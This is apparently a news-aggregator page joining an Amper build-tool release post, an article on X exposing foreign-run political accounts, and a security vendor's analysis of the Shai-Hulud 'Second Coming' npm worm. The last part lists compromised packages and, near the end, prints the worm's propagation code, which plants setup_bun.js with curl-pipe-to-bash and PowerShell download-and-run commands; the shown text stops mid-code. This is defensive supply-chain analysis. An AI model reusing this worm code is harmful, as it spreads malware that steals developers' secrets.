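    for manifest in sorted(root.rglob("module.yaml")) + sorted(root.rglob("libs.versions.toml")):
        h.update(str(manifest).encode())
        h.update(manifest.read_bytes())
    return h.hexdigest()

def load_or_resolve(root: Path, resolve):
    """Reuse the cached graph while the manifests are unchanged, else re-resolve."""
    fingerprint = manifests_fingerprint(root)
    if CACHE.exists():
        cached_fingerprint, graph = pickle.loads(CACHE.read_bytes())
        if cached_fingerprint == fingerprint:
            return graph                     # hot cache: skip resolution entirely
    graph = resolve(root)                    # cold path: full dependency resolution
    CACHE.parent.mkdir(parents=True, exist_ok=True)
    CACHE.write_bytes(pickle.dumps((fingerprint, graph)))
    return graph
```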

There is certainly more we can do here, and we’ll continue improving dependency resolution performance, so stay tuned!

Incremental compilation for Java

Amper has had task avoidance since day one, which means that it skips the whole compilation task of a module if its sources and dependencies haven’t changed. However, this doesn’t help if you have a large module with lots of sources, because any change in any file will cause the recompilation of the whole module.

This is where incremental compilation comes in. In Amper 0.9.0, you can use our incremental Java compilation engine, which recompiles only what’s necessary based on the exact changes in the module sources. Any change in your sources will still cause the compilation task to run, but now the task itself will be faster.

To enable this feature, simply add the following to your module.yaml file:

settings:
  java:
    compileIncrementally: true

Maven-like layout support

Amper’s default directory layout is simple and concise, and we love it. That said, we do understand that transitioning from Maven or Gradle is quite tedious and error-prone if it involves moving all files around. This is particularly painful if you want to try out Amper in a separate long-lived Git branch and get updates from your main branch.

As of Amper 0.9.0, you can choose to keep your sources and resources in the conventional Maven directory layout, so you don’t have to move your existing files immediately:

To do so, add layout: maven-like to your module.yaml file. If you intend to do this for all your modules, use a template to handle this in a central place.

Note: The maven-like layout is only available for the “jvm/app” and “jvm/lib” product types.

Library catalog at the project root

Amper now supports placing your Gradle-style version catalog ( libs.versions.toml ) in the project root instead of in the gradle folder. Of course, you are free to keep using gradle/libs.versions.toml if you want to keep compatibility with your Gradle layout.

In the IDE, using intention actions to extract dependencies to a new catalog will now create the catalog in the project root.

Note: You can only use a single library catalog for your project, so you have to pick one of the locations.

IDE improvements

Auto-sync of the project configuration

Changes to your Amper configuration files are now automatically taken into account, which means you no longer need to manually click the Sync button!

This was made possible by the improvements in dependency resolution caching we’ve seen above.

If syncing involves downloading new dependencies or other lengthy processes, you’ll see a progress indicator in the status bar; otherwise, the sync should be seamless.

Note: This behavior can be configured for the current project in “Settings | Build, Execution, Deployment | Build Tools”. If you want to change the default for future new projects, you can do so in “Settings | Advanced Settings | Build Tools. Amper”.

Sync details

The Build tool window now provides more insights into the stages of the sync process, and shows errors and warnings arising from them.

IDE assistance for setting the main class

You can configure the entrypoint of a jvm/app module using settings.jvm.mainClass . Finding the fully-qualified name of your main class is never fun, though. This is why IntelliJ IDEA now provides completion for it directly in your YAML file!

The completion list includes all class names that have a valid main function. By default, only classes present in the module itself are shown, but you can also invoke completion a second time to get results from your dependencies too:

That’s not all. IntelliJ IDEA also provides assistance with navigation and resolution, and it will even warn you about the infamous missing Kt suffix when referring to the class Kotlin generates for top-level main functions.

Improved quick-fix for overridden catalog versions

Amper warns you when your module doesn’t get the requested version of a dependency because of dependency conflicts. However, when this happens with a library catalog dependency, it isn’t obvious what the fix should be, as it depends on your intent.

To address this issue, IntelliJ IDEA now offers two different quick-fixes: one to replace the catalog reference with an explicit version in the problematic module, and one to update the version in the catalog itself. Use Alt+Enter or click the More actions… option in the warning tooltip to access these fixes:

Dedicated color theme settings

You can now customize the colors in your Amper YAML files.

Head over to File | Settings | Editor | Color Scheme | Amper and get creative!

Updated default versions

We updated some of our default versions for toolchains and frameworks:

  • Kotlin 2.2.21
  • Compose Hot Reload 1.0.0-rc01
  • KSP 2.3.0
  • JUnit Platform 6.0.1

Also, the default value for settings.jvm.release is now 21.

Try Amper 0.9.0

To update an existing project, use the ./amper update command.

To get started with Amper, check out our Getting started guide. Take a look at some examples, follow a tutorial, or read the comprehensive user guide depending on your learning style.

Share your feedback

Amper is still experimental and under active development. You can provide feedback about your experience by joining the discussion in the Kotlinlang Slack’s #amper channel or sharing your suggestions and ideas in a YouTrack issue . Your input and use cases help shape the future of Amper!

X Just Accidentally Exposed a Covert Influence Network Targeting Americans

Hacker News
weaponizedspaces.substack.com
2025-11-24 16:07:40
Comments...
Original Article

A new feature on X has revealed that a huge number of large, divisive political accounts claiming to be Trump supporters are actually operating out of foreign countries. The discovery — likely the most sweeping public exposure of covert foreign activity on a major platform since the revelations about Russia in 2016 — raises serious concerns about covert foreign influence in U.S. political discourse, mirroring the Russian disinformation campaign in which operatives from Russia’s Internet Research Agency posed as U.S. persons to interfere in the election.

The new feature on X allows users to see the approximate place where an account was created and is primarily operating from, rather than having to rely solely on an account operator’s self-reported location. The move was made to boost transparency and enhance the authenticity of discussions on the platform, but it immediately became apparent that the new feature would have an additional effect: exposing foreign accounts that are posing as Americans.

On Saturday, X users found scores of pro-Trump and MAGA accounts that were trying to pass as Americans but were operated from countries in Europe, Asia, Africa, and elsewhere. X acknowledges that some of the operating locations may actually be the location of a VPN service rather than the location of the account owner, but the sheer number of accounts operating from outside of the United States makes it clear that not all of these are simply proxy locations. Furthermore, some of these accounts had listed their locations as being within the U.S., and some were operating with usernames such as (@)American despite being operated from overseas. As X Product Chief Nikita Bier explained , if an account claims to be from a U.S. location but the data shows it’s based overseas, that discrepancy is a red flag suggesting the account “might have another agenda.”

A few examples of large MAGA accounts posing as Americans while operating from a foreign country.

While location-based discrepancies were found among all types of accounts, the most noticeable and largest group of accounts revealed to be operating from overseas were those reporting to be Trump fans, many of whom described themselves as “Patriots” who champion “America First” politics. For instance, a prominent account called “MAGA NATION” (with 392,000+ followers) turned out to be posting from Eastern Europe, not America. Other examples include “Dark MAGA” (15,000 followers, based in Thailand), “MAGA Scope” (51,000 followers, based in Nigeria), and an “America First” account (67,000 followers) run from Bangladesh. Other large political, crypto, and even public health influencer accounts claiming U.S. roots — many of which are also MAGA-aligned — are similarly being outed with locations traced to countries like India, Nigeria, and elsewhere. In each case, an account that gave every impression of being an American political participant — complaining about gas prices or vaccine mandates, cheering or mocking candidates, reacting to debates, and posting memes about things like the border or inflation — was run by someone who isn’t even in America.

Thanks to a new X feature, we now know that this pro-Trump account called “American” is not, in fact, American.

The exposure of foreign-run political accounts on X immediately calls to mind covert influence operations of the past – most notably, Russia’s meddling in the 2016 U.S. election. In 2016, Russia’s Internet Research Agency (IRA) infamously created countless fake social media personas impersonating Americans to sow discord and denigrate Hillary Clinton/boost Trump’s candidacy. According to the Mueller investigation’s conclusions and U.S. intelligence findings, these operatives “posed as U.S. persons…operated social media pages and groups designed to attract U.S. audiences…[and] falsely claimed to be controlled by U.S. activists when, in fact, they were controlled by [foreign actors].” Their strategy included using stolen identities and pretending to be grassroots American voices, all to infiltrate online communities and influence political opinion. By mid-2016 the IRA’s campaign explicitly focused on boosting Trump and disparaging Hillary Clinton, under orders from the Kremlin.

The pattern now emerging on X suggests history may be repeating itself, albeit likely with new actors and technologies. Or perhaps even more likely, these types of tactics never actually stopped in the first place. Covert foreign influence via social media remained a live threat in the run-up to the 2024 presidential election. In fact, investigative reporting by CNN in 2024 uncovered a campaign on X aimed at bolstering Trump’s candidacy – a network of at least 60 fake pro-Trump accounts using profile photos stolen from real women in Europe. These fake personas, posing as enthusiastic American Trump supporters, told U.S. voters to “vote for Trump in 2024” while the actual women depicted (from countries like Denmark, the Netherlands, and even Russia) had no idea their images were being misused.


The geographic spread of the exposed accounts hints at a variety of possible culprits and motives. Some accounts originate in countries historically linked to disinformation targeting the U.S. (e.g. Russia or Eastern European locales) while others come from places like Nigeria, India, Thailand, or Kenya with no obvious state sponsor. This suggests we could be seeing multiple layers of foreign influence: both state-sponsored influence operations (Russia and others) trying to sway U.S. politics, as well as a cottage industry of opportunists and trolls for hire globally who exploit U.S. political tribalism for clout or profit. In 2016, for example, not only did Russian agents interfere, but so did independent foreign scammers – notably the notorious “Macedonian fake news farms” where teenagers churned out pro-Trump disinformation simply because it drew huge web traffic and ad revenue. Today’s foreign MAGA accounts could likewise be profit-driven grifters – people pretending to be patriotic Americans while actually just racking up followers and perhaps soliciting donations or earning X’s ad-share payouts from viral content.

The discovery that a significant number of political accounts – especially in the pro-Trump/MAGA sphere – are operated from abroad carries far-reaching implications. It validates warnings that covert foreign influence on social media did not end with 2016, but is an ongoing challenge to U.S. democracy and societal cohesion. The immediate impact is a jolt of awareness: both the public and policymakers can now see concrete examples of how outsiders try to shape American political conversations from afar. This awareness, thanks to X’s transparency feature, is a double-edged sword. On the one hand, it empowers users and authorities to identify and possibly neutralize foreign propaganda by calling it out and removing its mask of authenticity. On the other hand, it injects a new layer of skepticism and accusation into political discourse – people may reflexively dismiss opposing views as “just foreign bots,” and genuine activists might find themselves under suspicion if their location isn’t easily verified.


Moving forward, we’ll likely see a re-examination of how much credence we give to social media as a barometer of public opinion. Lawmakers, campaigners, and journalists will need to vet online trends more carefully (e.g. check if a trending political hashtag is heavily driven by accounts from overseas). The platform implications for X are significant as well: X must decide whether it will actively clamp down on these foreign-run accounts or simply inform users and leave the content up. Its reputation as a platform for healthy political dialogue is on the line; too much manipulation could drive users to alternatives or invite regulatory backlash.

As for the rest of us, the implications are similar to those following the 2016 Russian campaign: we’re still under attack and likely have been this whole time.

I’ll return with a more detailed analysis of these revelations soon, so stay tuned.


SHA1-Hulud the Second Comming – Postman, Zapier, PostHog All Compromised via NPM

Hacker News
www.aikido.dev
2025-11-24 16:03:36
Comments...
Original Article

It's another Monday morning, sitting down at the computer. And I see a stack of alerts from the last hour of packages showing signs of malware in our triage queue. Having not yet finished my first cup of coffee, I see Shai Hulud indicators. Yikes, surely that's a false positive? Nope, welcome to Monday, Shai Hulud struck again. Strap in.

Timeline of the Shai-Hulud Campaign

The timing is notable, given npm’s recent announcement that it will revoke classic tokens on December 9 after the wave of supply-chain attacks. With many users still not migrated to trusted publishing, the attacker seized the moment for one more hit before npm’s deadline.

  • August 27 - We release our report detailing the S1ngularity campaign targeting several nx packages on npm.
  • September 16 - The attacker strikes again , launching the first wave of the Shai-Hulud attacks.
  • September 18 - We publish a follow-up analysis , diving deeper into the campaign’s technical quirks and early payload behavior.
  • November 24 - A second strike occurs, dubbed the “Second Coming” by the attackers, timed just before npm’s deadline for revoking old tokens.

What is Shai-Hulud?: A Quick Refresher

Shai-Hulud, named after the gigantic sandworms from Dune as part of the attacker's flair for theatrics, is a self-replicating npm worm built to spread quickly through compromised developer environments. Once it infects a system, it searches for exposed secrets such as API keys and tokens using TruffleHog and publishes anything it finds to a public GitHub repository . It then attempts to push new copies of itself to npm, helping it propagate across the ecosystem, while exfiltrating data back to the attacker. Keeping with the dramatic theme, the attacker refers to this latest wave as the “Second Coming.”

Differences from last time

This time around, there are some significant differences in the attack:

  • It installs Bun with the file setup_bun.js and then uses it to execute bun_environment.js, which contains the actual malicious code (a quick scan for these files is sketched after this list).
  • It creates a repository with a random name for the stolen data, rather than a hardcoded one.
  • It will infect up to 100 npm packages, compared to 20 last time.
  • If it can't authenticate with GitHub or npm, it will wipe all files in the user's home directory.
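
Based on the indicator file names above, a rough triage script can walk node_modules and flag anything shipping them. This is only a quick aid, not a substitute for a proper audit or for checking your lockfile against the affected versions; the node_modules path is an assumption about your project layout.

```python
#!/usr/bin/env python3
"""Rough triage helper: flag packages shipping known Shai-Hulud indicator files."""
from pathlib import Path

# File names reported for this campaign; their absence proves nothing.
INDICATORS = {"setup_bun.js", "bun_environment.js"}

def scan(node_modules: Path) -> list[Path]:
    """Return every file under node_modules whose name matches an indicator."""
    return [p for p in node_modules.rglob("*.js") if p.name in INDICATORS]

if __name__ == "__main__":
    hits = scan(Path("node_modules"))
    for hit in hits:
        print(f"suspicious file: {hit}")
    if not hits:
        print("no indicator files found (this alone does not prove you are clean)")
```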

Which packages are affected?

We've detected the following packages compromised with a new version of Shai-Hulud. Together, these 492 packages have a total of 132 million monthly downloads:

  • @asyncapi/diff
  • @asyncapi/nodejs-ws-template
  • go-template
  • @asyncapi/avro-schema-parser
  • @asyncapi/converter
  • @asyncapi/dotnet-rabbitmq-template
  • @asyncapi/nunjucks-filters
  • @asyncapi/protobuf-schema-parser
  • @asyncapi/problem
  • @asyncapi/optimizer
  • @asyncapi/python-paho-template
  • @asyncapi/multi-parser
  • @asyncapi/bundler
  • @asyncapi/php-template
  • asyncapi-preview
  • @asyncapi/java-spring-cloud-stream-template
  • @asyncapi/modelina-cli
  • @asyncapi/generator-helpers
  • @asyncapi/java-template
  • @asyncapi/react-component
  • @asyncapi/generator
  • @asyncapi/server-api
  • @asyncapi/java-spring-template
  • @asyncapi/cli
  • @asyncapi/web-component
  • @asyncapi/specs
  • @asyncapi/modelina
  • @asyncapi/parser
  • @asyncapi/html-template
  • @asyncapi/go-watermill-template
  • @asyncapi/openapi-schema-parser
  • @asyncapi/edavisualiser
  • @asyncapi/generator-components
  • dotnet-template
  • @asyncapi/keeper
  • github-action-for-generator
  • @asyncapi/nodejs-template
  • @asyncapi/markdown-template
  • @quick-start-soft/quick-git-clean-markdown
  • @quick-start-soft/quick-markdown-image
  • @quick-start-soft/quick-markdown-translator
  • @quick-start-soft/quick-markdown
  • test23112222-api
  • @asyncapi/generator-react-sdk
  • @quick-start-soft/quick-markdown-compose
  • iron-shield-miniapp
  • manual-billing-system-miniapp-api
  • shinhan-limit-scrap
  • @strapbuild/react-native-perspective-image-cropper
  • react-native-use-modal
  • @quick-start-soft/quick-task-refine
  • @strapbuild/react-native-date-time-picker
  • @strapbuild/react-native-perspective-image-cropper-2
  • create-glee-app
  • @strapbuild/react-native-perspective-image-cropper-poojan31
  • @asyncapi/studio
  • @quick-start-soft/quick-markdown-print
  • @quick-start-soft/quick-remove-image-background
  • eslint-config-zeallat-base
  • korea-administrative-area-geo-json-util
  • @quick-start-soft/quick-document-translator
  • axios-builder
  • posthog-node
  • @posthog/first-time-event-tracker
  • @posthog/event-sequence-timer-plugin
  • @posthog/gitub-star-sync-plugin
  • posthog-plugin-hello-world
  • @posthog/bitbucket-release-tracker
  • @posthog/maxmind-plugin
  • @posthog/postgres-plugin
  • @posthog/twilio-plugin
  • @posthog/cli
  • @posthog/clickhouse
  • @posthog/snowflake-export-plugin
  • posthog-react-native-session-replay
  • @posthog/drop-events-on-property-plugin
  • @posthog/github-release-tracking-plugin
  • @posthog/icons
  • @posthog/geoip-plugin
  • @posthog/intercom-plugin
  • @posthog/plugin-unduplicates
  • @posthog/react-rrweb-player
  • drop-events-on-property-plugin
  • @posthog/ingestion-alert-plugin
  • @posthog/kinesis-plugin
  • @posthog/laudspeaker-plugin
  • @posthog/nextjs
  • @posthog/nextjs-config
  • @posthog/automatic-cohorts-plugin
  • @posthog/migrator3000-plugin
  • @posthog/pagerduty-plugin
  • @posthog/plugin-contrib
  • @posthog/sendgrid-plugin
  • @posthog/customerio-plugin
  • @posthog/rrweb-utils
  • @posthog/taxonomy-plugin
  • @posthog/zendesk-plugin
  • @posthog/netdata-event-processing
  • @posthog/url-normalizer-plugin
  • posthog-docusaurus
  • @posthog/currency-normalization-plugin
  • @posthog/filter-out-plugin
  • @posthog/heartbeat-plugin
  • @actbase/react-native-fast-image
  • @posthog/ai
  • @posthog/databricks-plugin
  • @actbase/react-native-kakao-channel
  • calc-loan-interest
  • @actbase/react-absolute
  • @actbase/react-daum-postcode
  • @actbase/react-native-simple-video
  • @posthog/core
  • @posthog/lemon-ui
  • @seung-ju/next
  • @seung-ju/react-hooks
  • posthog-react-native
  • @actbase/css-to-react-native-transform
  • @actbase/react-native-actionsheet
  • @actbase/react-native-tiktok
  • @seung-ju/react-native-action-sheet
  • @actbase/react-kakaosdk
  • @posthog/agent
  • @posthog/variance-plugin
  • discord-bot-server
  • @posthog/rrweb-replay
  • @posthog/rrweb-snapshot
  • @actbase/node-server
  • @actbase/react-native-devtools
  • @posthog/plugin-server
  • @posthog/rrweb-record
  • @actbase/native
  • @actbase/react-native-less-transformer
  • @posthog/rrweb
  • posthog-js
  • @posthog/web-dev-server
  • @posthog/piscina
  • @posthog/nuxt
  • @posthog/rrweb-player
  • @posthog/wizard
  • @actbase/react-native-kakao-navi
  • @posthog/siphash
  • @posthog/twitter-followers-plugin
  • @actbase/react-native-naver-login
  • @seung-ju/openapi-generator
  • @posthog/rrdom
  • @posthog/hedgehog-mode
  • react-native-worklet-functions
  • expo-audio-session
  • poper-react-sdk
  • @postman/secret-scanner-wasm
  • @postman/csv-parse
  • @postman/node-keytar
  • @postman/tunnel-agent
  • @postman/pm-bin-macos-arm64
  • @postman/pm-bin-linux-x64
  • @postman/postman-collection-fork
  • @postman/postman-mcp-server
  • @postman/wdio-junit-reporter
  • @postman/aether-icons
  • @postman/postman-mcp-cli
  • @postman/pretty-ms
  • @postman/pm-bin-windows-x64
  • @postman/wdio-allure-reporter
  • @postman/final-node-keytar
  • @postman/pm-bin-macos-x64
  • @aryanhussain/my-angular-lib
  • capacitor-plugin-apptrackingios
  • capacitor-plugin-purchase
  • capacitor-purchase-history
  • capacitor-voice-recorder-wav
  • scgs-capacitor-subscribe
  • @postman/mcp-ui-client
  • capacitor-plugin-scgssigninwithgoogle
  • @kvytech/medusa-plugin-announcement
  • @kvytech/medusa-plugin-product-reviews
  • medusa-plugin-zalopay
  • scgsffcreator
  • @kvytech/habbit-e2e-test
  • medusa-plugin-logs
  • medusa-plugin-product-reviews-kvy
  • @kvytech/medusa-plugin-promotion
  • medusa-plugin-momo
  • @kvytech/components
  • medusa-plugin-announcement
  • @kvytech/cli
  • @kvytech/medusa-plugin-newsletter
  • @kvytech/medusa-plugin-management
  • @kvytech/web
  • create-hardhat3-app
  • test-hardhat-app
  • evm-checkcode-cli
  • gate-evm-tools-test
  • gate-evm-check-code2
  • web-types-htmx
  • test-foundry-app
  • web-types-lit
  • bun-plugin-httpfile
  • open2internet
  • vite-plugin-httpfile
  • @ensdomains/vite-plugin-i18next-loader
  • @ensdomains/blacklist
  • @ensdomains/durin
  • @ensdomains/renewal
  • @ensdomains/cypress-metamask
  • bytecode-checker-cli
  • @ensdomains/dnsprovejs
  • @ensdomains/ccip-read-dns-gateway
  • @ensdomains/ccip-read-cf-worker
  • @ensdomains/dnssec-oracle-anchors
  • @ensdomains/reverse-records
  • @ensdomains/ens-test-env
  • @ensdomains/hackathon-registrar
  • @ensdomains/renewal-widget
  • crypto-addr-codec
  • @ensdomains/solsha1
  • @ensdomains/server-analytics
  • @ensdomains/ui
  • @ensdomains/test-utils
  • @ensdomains/mock
  • @ensdomains/ccip-read-router
  • @zapier/babel-preset-zapier
  • @ensdomains/hardhat-chai-matchers-viem
  • @ensdomains/ccip-read-worker-viem
  • @zapier/browserslist-config-zapier
  • @zapier/zapier-sdk
  • @zapier/stubtree
  • zapier-async-storage
  • @zapier/ai-actions
  • @zapier/mcp-integration
  • @zapier/spectral-api-ruleset
  • @ensdomains/address-encoder
  • redux-router-kit
  • @ensdomains/eth-ens-namehash
  • zapier-scripts
  • @ensdomains/buffer
  • @ensdomains/thorin
  • zapier-platform-legacy-scripting-runner
  • zapier-platform-schema
  • @ensdomains/dnssecoraclejs
  • zapier-platform-core
  • @ensdomains/op-resolver-contracts
  • @ensdomains/ens-archived-contracts
  • @ensdomains/ensjs
  • @ensdomains/subdomain-registrar
  • @ensdomains/unruggable-gateways
  • @ensdomains/web3modal
  • zapier-platform-cli
  • @ensdomains/ens-contracts
  • @ensdomains/react-ens-address
  • @ensdomains/curvearithmetics
  • @zapier/secret-scrubber
  • @ensdomains/hardhat-toolbox-viem-extended
  • ethereum-ens
  • @ensdomains/durin-middleware
  • @ensdomains/unicode-confusables
  • @ensdomains/ensjs-react
  • @ensdomains/content-hash
  • @ensdomains/ens-avatar
  • @zapier/ai-actions-react
  • @zapier/eslint-plugin-zapier
  • @ensdomains/offchain-resolver-contracts
  • @ensdomains/ens-validation
  • @ensdomains/name-wrapper
  • @hapheus/n8n-nodes-pgp
  • @markvivanco/app-version-checker
  • claude-token-updater
  • n8n-nodes-tmdb
  • devstart-cli
  • skills-use
  • @mcp-use/inspector
  • zuper-sdk
  • zuper-stream
  • @mcp-use/mcp-use
  • create-mcp-use-app
  • mcp-use
  • @mcp-use/cli
  • zuper-cli
  • @caretive/caret-cli
  • cpu-instructions
  • lite-serper-mcp-server
  • @louisle2/core
  • jan-browser
  • exact-ticker
  • react-library-setup
  • orbit-soap
  • @orbitgtbelgium/mapbox-gl-draw-scale-rotate-mode
  • token.js-fork
  • react-component-taggers
  • @louisle2/cortex-js
  • orbit-nebula-editor
  • @trigo/pathfinder-ui-css
  • @trigo/jsdt
  • @trigo/atrix-redis
  • @trigo/eslint-config-trigo
  • @trigo/atrix-orientdb
  • @trigo/node-soap
  • eslint-config-trigo
  • @trigo/bool-expressions
  • @trigo/atrix-pubsub
  • @trigo/atrix-elasticsearch
  • @trigo/hapi-auth-signedlink
  • @trigo/keycloak-api
  • @trigo/atrix-soap
  • @trigo/atrix-swagger
  • @trigo/atrix-acl
  • atrix
  • redux-forge
  • @trigo/atrix-mongoose
  • @trigo/atrix
  • orbit-boxicons
  • atrix-mongoose
  • bool-expressions
  • react-element-prompt-inspector
  • trigo-react-app
  • @trigo/trigo-hapijs
  • @trigo/fsm
  • command-irail
  • @orbitgtbelgium/mapbox-gl-draw-cut-polygon-mode
  • @trigo/atrix-postgres
  • @orbitgtbelgium/time-slider
  • @orbitgtbelgium/orbit-components
  • orbit-nebula-draw-tools
  • typeorm-orbit
  • @mparpaillon/connector-parse
  • @mparpaillon/imagesloaded
  • @commute/market-data
  • gitsafe
  • @osmanekrem/error-handler
  • @commute/bloom
  • okta-react-router-6
  • designstudiouiux
  • itobuz-angular
  • @ifelsedeveloper/protocol-contracts-svm-idl
  • ito-button
  • @dev-blinq/cucumber_client
  • blinqio-executions-cli
  • itobuz-angular-auth
  • @dev-blinq/ai-qa-logic
  • axios-timed
  • react-native-email
  • tenacious-fetch
  • kill-port
  • jacob-zuma
  • luno-api
  • @lessondesk/eslint-config
  • sort-by-distance
  • just-toasty
  • image-to-uri
  • react-native-phone-call
  • formik-error-focus
  • jquery-bindings
  • @lessondesk/babel-preset
  • barebones-css
  • coinmarketcap-api
  • license-o-matic
  • @varsityvibe/api-client
  • pico-uid
  • hyperterm-hipster
  • set-nested-prop
  • bytes-to-x
  • enforce-branch-name
  • fittxt
  • get-them-args
  • react-native-retriable-fetch
  • svelte-autocomplete-select
  • feature-flip
  • lint-staged-imagemin
  • react-native-view-finder
  • formik-store
  • shell-exec
  • react-native-log-level
  • @everreal/web-analytics
  • react-native-jam-icons
  • @thedelta/eslint-config
  • parcel-plugin-asset-copier
  • react-native-websocket
  • ra-data-firebase
  • react-jam-icons
  • react-native-fetch
  • @ifings/design-system
  • gatsby-plugin-cname
  • @alexcolls/nuxt-ux
  • react-native-datepicker-modal
  • undefsafe-typed
  • chrome-extension-downloads
  • @alexcolls/nuxt-socket.io
  • fuzzy-finder
  • sa-company-registration-number-regex
  • flapstacks
  • react-keycloak-context
  • react-qr-image
  • @tiaanduplessis/react-progressbar
  • @lessondesk/schoolbus
  • @tiaanduplessis/json
  • react-native-get-pixel-dimensions
  • nanoreset
  • next-circular-dependency
  • url-encode-decode
  • axios-cancelable
  • compare-obj
  • wenk
  • haufe-axera-api-client
  • obj-to-css
  • sa-id-gen
  • @lessondesk/api-client
  • @varsityvibe/validation-schemas
  • flatten-unflatten
  • stoor
  • @clausehq/flows-step-jsontoxml
  • @accordproject/concerto-analysis
  • hope-mapboxdraw
  • count-it-down
  • hopedraw
  • @accordproject/markdown-it-cicero
  • piclite
  • @fishingbooker/react-swiper
  • @fishingbooker/browser-sync-plugin
  • generator-meteor-stock
  • @fishingbooker/react-loader
  • benmostyn-frame-print
  • @fishingbooker/react-pagination
  • @voiceflow/anthropic
  • @voiceflow/voice-types
  • @voiceflow/default-prompt-wrappers
  • @voiceflow/npm-package-json-lint-config
  • @voiceflow/nestjs-mongodb
  • @voiceflow/tsconfig
  • @voiceflow/test-common
  • @voiceflow/husky-config
  • @voiceflow/commitlint-config
  • @voiceflow/git-branch-check
  • normal-store
  • @voiceflow/prettier-config
  • @voiceflow/stylelint-config
  • vf-oss-template
  • @voiceflow/storybook-config
  • @voiceflow/verror
  • @voiceflow/alexa-types
  • @voiceflow/nestjs-timeout
  • @voiceflow/serverless-plugin-typescript
  • @voiceflow/voiceflow-types
  • shelf-jwt-sessions
  • @hover-design/react
  • @voiceflow/base-types
  • @voiceflow/eslint-config
  • @voiceflow/fetch
  • @voiceflow/common
  • @voiceflow/eslint-plugin
  • @voiceflow/exception
  • @voiceflow/dtos-interact
  • @voiceflow/google-types
  • @voiceflow/nestjs-common
  • @voiceflow/pino
  • @voiceflow/sdk-runtime
  • @voiceflow/nestjs-rate-limit
  • @voiceflow/openai
  • dialogflow-es
  • @voiceflow/widget
  • arc-cli-fc
  • composite-reducer
  • bidirectional-adapter
  • @antstackio/express-graphql-proxy
  • @antstackio/json-to-graphql
  • @voiceflow/body-parser
  • @voiceflow/logger
  • @antstackio/eslint-config-antstack
  • @voiceflow/vitest-config
  • @faq-component/core
  • @pruthvi21/use-debounce
  • @voiceflow/api-sdk
  • @hover-design/core
  • @faq-component/react
  • @voiceflow/semantic-release-config
  • @voiceflow/vite-config
  • @voiceflow/circleci-config-sdk-orb-import
  • @voiceflow/backend-utils
  • @voiceflow/slate-serializer
  • @voiceflow/google-dfes-types
  • n8n-nodes-viral-app
  • @accordproject/markdown-docx
  • @clausehq/flows-step-sendgridemail
  • @lpdjs/firestore-repo-service
  • @trefox/sleekshop-js
  • invo
  • jsonsurge
  • mon-package-react-typescript
  • rediff
  • solomon-api-stories
  • solomon-v3-stories
  • solomon-v3-ui-wrapper
  • tcsp-draw-test
  • uplandui

Leaking secrets

This time, the malware also publishes stolen secrets to GitHub, in repositories with random names and the description:

"Sha1-Hulud: The Second Coming."

Currently we see 26.3k repositories exposed.

Mistakes made again

As we've been analyzing all these packages, we've noticed a number of compromised packages that appear to be from community spread, which contain the initial staging code in setup_bun.js but NOT bun_environment.js, the Shai Hulud worm itself. Here's the code that spreads the worm into other packages:

  async ["bundleAssets"](_0x349b3d) {
    let _0x2bd41c = a0_0x459ea5.join(_0x349b3d, 'package', "setup_bun.js");
    await iL0(_0x2bd41c, "#!/usr/bin/env node\nconst { spawn, execSync } = require('child_process');\nconst path = require('path');\nconst fs = require('fs');\nconst os = require('os');\n\nfunction isBunOnPath() {\n  try {\n    const command = process.platform === 'win32' ? 'where bun' : 'which bun';\n    execSync(command, { stdio: 'ignore' });\n    return true;\n  } catch {\n    return false;\n  }\n}\n\nfunction reloadPath() {\n  // Reload PATH environment variable\n  if (process.platform === 'win32') {\n    try {\n      // On Windows, get updated PATH from registry\n      const result = execSync('powershell -c \"[Environment]::GetEnvironmentVariable(\\'PATH\\', \\'User\\') + \\';\\' + [Environment]::GetEnvironmentVariable(\\'PATH\\', \\'Machine\\')\"', {\n        encoding: 'utf8'\n      });\n      process.env.PATH = result.trim();\n    } catch {\n    }\n  } else {\n    try {\n      // On Unix systems, source common shell profile files\n      const homeDir = os.homedir();\n      const profileFiles = [\n        path.join(homeDir, '.bashrc'),\n        path.join(homeDir, '.bash_profile'),\n        path.join(homeDir, '.profile'),\n        path.join(homeDir, '.zshrc')\n      ];\n\n      // Try to source profile files to get updated PATH\n      for (const profileFile of profileFiles) {\n        if (fs.existsSync(profileFile)) {\n          try {\n            const result = execSync(`bash -c \"source ${profileFile} && echo $PATH\"`, {\n              encoding: 'utf8',\n              stdio: ['pipe', 'pipe', 'ignore']\n            });\n            if (result && result.trim()) {\n              process.env.PATH = result.trim();\n              break;\n            }\n          } catch {\n            // Continue to next profile file\n          }\n        }\n      }\n\n      // Also check if ~/.bun/bin exists and add it to PATH if not already there\n      const bunBinDir = path.join(homeDir, '.bun', 'bin');\n      if (fs.existsSync(bunBinDir) && !process.env.PATH.includes(bunBinDir)) {\n        process.env.PATH = `${bunBinDir}:${process.env.PATH}`;\n      }\n    } catch {}\n  }\n}\n\nasync function downloadAndSetupBun() {\n  try {\n    let command;\n    if (process.platform === 'win32') {\n      // Windows: Use PowerShell script\n      command = 'powershell -c \"irm bun.sh/install.ps1|iex\"';\n    } else {\n      // Linux/macOS: Use curl + bash script\n      command = 'curl -fsSL https://bun.sh/install | bash';\n    }\n\n    execSync(command, {\n      stdio: 'ignore',\n      env: { ...process.env }\n    });\n\n    // Reload PATH to pick up newly installed bun\n    reloadPath();\n\n    // Find bun executable after installation\n    const bunPath = findBunExecutable();\n    if (!bunPath) {\n      throw new Error('Bun installation completed but executable not found');\n    }\n\n    return bunPath;\n  } catch  {\n    process.exit(0);\n  }\n}\n\nfunction findBunExecutable() {\n  // Common locations where bun might be installed\n  const possiblePaths = [];\n\n  if (process.platform === 'win32') {\n    // Windows locations\n    const userProfile = process.env.USERPROFILE || '';\n    possiblePaths.push(\n      path.join(userProfile, '.bun', 'bin', 'bun.exe'),\n      path.join(userProfile, 'AppData', 'Local', 'bun', 'bun.exe')\n    );\n  } else {\n    // Unix locations\n    const homeDir = os.homedir();\n    possiblePaths.push(\n      path.join(homeDir, '.bun', 'bin', 'bun'),\n      '/usr/local/bin/bun',\n      '/opt/bun/bin/bun'\n    );\n  }\n\n  // Check if bun is now available on PATH\n  if (isBunOnPath()) {\n  
